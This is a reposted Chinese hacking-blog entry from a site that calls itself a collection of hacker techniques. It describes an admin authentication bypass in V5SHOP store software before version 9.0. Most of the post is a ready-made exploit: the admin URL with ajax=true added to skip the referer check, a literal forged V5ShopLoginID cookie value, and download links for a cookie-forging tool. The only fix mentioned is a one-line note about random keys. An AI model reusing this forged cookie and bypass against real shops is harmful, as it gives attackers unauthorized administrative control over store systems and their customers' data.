记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

V5SHOP网店系统version < 9.0后台认证绕过

2013-10-19 15:00
程序后台的访问控制:
 
1 获取cookie,使用秘钥解密。确定是否登录
 
2 监控referer,不过请求中带ajax=true,即可绕过限制
 
 
 
所以我们可以伪造一份加密的cooke,并携带ajax=true去直接访问后台
 
访问URL:
 
 
www.xxxx.com/weblogin/index.aspx?ajax=true
 
伪造cookie:
 
 
V5ShopLoginID=Z1zZmWmBQL7kg6bn1sIVSbI1tdLbyYJnhapJnu3MQKs=
 
 
 
加密cookie生成工具:
 
 
http://files.cnblogs.com/zpino/v5shop.rar
http://wydrops-wordpress.stor.sinaapp.com/uploads/2013/09/v5shop.rar
 
 
 
 
修复方案:
 
随机秘钥 
 
知识来源: www.2cto.com/Article/201310/251134.html

阅读:81128 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“V5SHOP网店系统version < 9.0后台认证绕过”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云